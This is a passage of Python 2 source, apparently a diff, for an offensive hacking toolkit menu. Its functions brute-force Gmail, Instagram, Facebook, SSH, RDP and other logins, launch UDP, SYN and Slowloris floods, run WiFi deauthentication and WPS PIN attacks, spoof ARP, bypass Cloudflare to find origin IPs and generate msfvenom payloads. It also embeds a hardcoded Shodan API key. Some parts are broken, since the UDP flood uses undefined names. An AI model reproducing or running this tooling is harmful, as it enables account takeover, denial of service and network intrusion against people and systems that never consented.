\X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) + os.system('echo "arp.spoof on\n" >> arp.cap') + print '\n\033[93mto stop type "exit"\033[0m' + os.system("sleep 2") + os.system("bettercap -no-history -caplet arp.cap") + os.system("rm arp.cap") +#-------------# +#ARP SPOOF END# + + +#SSL SCAN START# +#--------------# +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +#------------# +#SSL SCAN END# + + +#MAKE A PAYLOAD START# +#--------------------# +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + s = raw_input("File Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -o /root/{3}.{4}'.format(f,l,c,h,s) + os.system(a) +#------------------# +#MAKE A PAYLOAD END# + + +#WORDLIST MAKER START# +#--------------------# +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +#------------------# +#WORDLIST MAKER END# + + +#INTERNET TRAFFIC START# +#----------------------# +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +#--------------------# +#INTERNET TRAFFIC END# + + +#RESET ACCOUNT PASSWORD START# +#----------------------------# +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +#--------------------------# +#RESET ACCOUNT PASSWORD END# + + +#RESET UNIX PASSWORD START# +#-------------------------# +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +#-----------------------# +#RESET UNIX PASSWORD END# + + +#FIND HASH TYPE START# +#--------------------# +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", 